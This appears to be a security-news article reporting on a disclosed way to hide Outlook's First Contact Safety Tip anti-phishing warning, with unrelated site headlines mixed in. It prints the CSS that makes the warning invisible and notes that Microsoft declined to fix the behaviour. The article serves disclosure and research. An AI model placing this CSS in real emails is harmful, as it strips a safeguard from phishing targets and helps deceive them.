InfoSecBulletin Cybersecurity for mankind
Outlook displays an alert when a user receives an email from an unfamiliar address. The alert message says “You don’t often get email from [email protected]. Learn why this is important”. Microsoft refers to this as the First Contact Safety Tip. It is one of the anti-phishing measures provided by Exchange Online Protection (EOP) and Microsoft Defender for organizations using Office 365.
You can change how the First Contact Safety Tip is displayed in an HTML email by using CSS style tags.
Renew Dubai visa within minutes with AI-powered Salama
CVE-2024-20953
CISA Flags Oracle Agile PLM Actively Exploited Security Flaw
Stablecoin Bank Hacked – Hackers Stolen $49.5M
CVE-2025-20029
PoC Exploit Released for F5 BIG-IP Command Injection Vuln
By 1 April 2025
Australia Bans Kaspersky on its govt systems and devices
CISA Flags Craft CMS Code Injection Flaw Amid Active Attacks
B1ack’s Stash Releases 1 Million Credit Cards on a Deep Web Forum
Cisco Confirms
Salt Typhoon Exploited CVE-2018-0171 to Target U.S. Telecom Networks
AWS Key Hunter
Test this free automated tool to hunt for exposed AWS secrets
Check Point Flaw Used to Deploy ShadowPad and Ransomware
To hide the First Contact Safety Tip in an HTML email, we can change the background and font colors to white. This will make the alert effectively invisible to the end user.
<head>
</head>
<head>
<style>
a {
display: none;
}
td div {
color: white;
font-size: 0px;
}
table tbody tr td {
background-color: white !important;
color: white !important;
}
</style>
</head>
…[SNIP]…
By using this HTML code in an e-mail, the alert does not show up in the email body anymore!
Note that the e-mail preview (highlighted in red) still begins with the Safety Tip.
Responsible Disclosure:
After developing a proof of concept, and preparing an advisory, we made Microsoft aware of these issues through the Microsoft Researcher Portal (MSRC). Microsoft chose to not address this behavior for now: (Click here to read the full report)
